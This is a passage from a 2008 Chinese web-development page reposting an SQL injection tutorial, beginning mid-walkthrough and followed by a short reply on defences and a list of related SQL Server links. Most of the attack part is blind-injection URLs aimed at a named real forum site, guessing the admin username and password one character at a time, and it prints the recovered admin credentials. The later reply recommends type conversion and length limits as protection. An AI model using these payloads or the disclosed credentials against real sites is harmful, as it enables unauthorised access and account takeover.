给大家发一个SQL注入实战教程吧
2008-10-27 16:51:38 来源:WEB开发网len(password)=10)
呵呵~~密码长度为10.
用户名长度为:10 密码长度为:10
现在来猜用户名.
http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where
mid(username,1,1)='a')
错了~~
我再猜~~
http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where
mid(username,1,1)='s')
呵呵~~正确~~
用户名第一位是 s
猜用户名的第二位~~
http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where
mid(username,2,1)='h')
用户名第二位是 h
由于时间关系,我早就猜好了,用户名:shbbsadmin
我们现在来猜密码~~ 猜密码跟猜用户名一样~~
http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where
mid(password,1,1)='s')
猜啊猜~
由于时间关系,密码我都猜好了,呵呵~~密码:shbbsadmin 哈哈~~跟用户名一样~~~~
用户:shbbsadmin
密码:shbbsadmin
============================================================
呵呵,我以前用动网文章系统,被sql注入攻击者都写成教程给别人下载了
有些SB就拿我开刀,所幸我的论坛和文章发布系统用户名密码各不相同,否则损失可惨了
于是培养了稍于注意安全的写代码习惯。
如ID等数值型参数都是加cint()进行类型转换的,注入绝对是不成功的,如果是字符型参数都不用害怕',会当
做一个字符部分,毫无作用。
另外就是对传入参数做长度限定,比如
if len(request("id"))>5 then response.end
简单的一句话让注入攻击者一筹莫展
- ››sql server自动生成批量执行SQL脚本的批处理
- ››sql server 2008亿万数据性能优化
- ››SQL Server 2008清空数据库日志方法
- ››sqlserver安装和简单的使用
- ››SQL Sever 2008 R2 数据库管理
- ››SQL SERVER无法安装成功,sqlstp.log文件提示[未发...
- ››Sql Server中通过父记录查找出所有关联的子记录
- ››SqlServer触发器、存储过程和函数
- ››SQL Server 中的事务(含义,属性,管理)
- ››Sqlite数据库插入和读取图片数据
- ››Sql server 2005拒绝了对对象 'xx表' (数...
- ››Sql server 2005拒绝了对对象 'xx表' (数...
更多精彩
赞助商链接